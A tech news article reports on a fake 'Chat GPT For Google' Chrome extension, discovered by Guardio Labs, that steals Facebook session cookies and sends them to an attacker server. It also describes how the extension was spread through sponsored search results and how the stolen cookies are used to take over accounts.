Bogus ChatGPT extension steals Facebook cookies
All aboard the chatbot hype train! Next stop: Fraud
Google has removed a ChatGPT extension from the Chrome store that steals Facebook session cookies – but not before more than 9,000 users installed the account-compromising bot.
The malicious extension – Chat GPT For Google (note the erroneous space in the name of the chatbot) – is very similar in name and code to the real ChatGPT For Google extension. In fact, the phony extension is based on the same open source project used by the actual ChatGPT For Google tool – all the fraudsters had to do was add a few lines of cookie-stealing code.
The end result is an extension that looks and acts just like ChatGPT from a user's perspective, according to Guardio Labs security researchers, which discovered the so-called "FakeGPT."
The cookie thieves push the fake add-on through malicious, sponsored Google Search results for "Chat GPT 4," the researchers said, thus capitalizing on users who want to try out the latest version of the chatbot.
And because the scam extension was offered in the official Chrome store, users likely assumed it was the real thing.
Well done on that curation, Google.
"Based on version 1.16.6 of the open source project, this FakeGPT variant does only one specific malicious action, right after installation, and the rest is basically the same as the genuine code – leaving no reasons to suspect," Nati Tal, head of Guardio Labs, wrote in a blog post.
- Google reminds everyone it too can launch a ChatGPT-like chatbot … waiting list
- Russian criminals can't wait to hop over OpenAI's fence, use ChatGPT for evil
- Forget ChatGPT, the most overhyped security tool is technology itself, Wiz warns
- AI-generated phishing emails just got much more convincing
That one specific malicious action is to filter Facebook-related cookies from the full list acquired via the Chrome Extension API. The forked code also encrypts the cookies list with AES, and smuggles the stolen sweets back to the attacker's command-and-control server hosted on the workers.dev service.
This is notable, because it's the service used with the original FakeGPT variant that Guardio Labs also discovered. That earlier one allowed attackers to hijack business Facebook accounts under the guise of a ChatGPT Chrome extension.
Once they've stolen the cookies, miscreants can then change the account login information to lock the real users out, and use the hijacked pages as promotional bots or to spread extremist propaganda.
This latest example of cybercriminals jumping on the ChatGPT hype train illustrates how the "misuse of ChatGPT's brand and popularity just keeps on rising, used not only for Facebook account harvesting and not only with malicious fake Extensions for Chrome," according to Tal.
While some crooks may be using the AI to develop polymorphic malware, most won't need to work nearly that hard. All it takes is a buzzy new tech tool, and tricking someone into clicking on a malicious link or downloading a phony app or extension. ®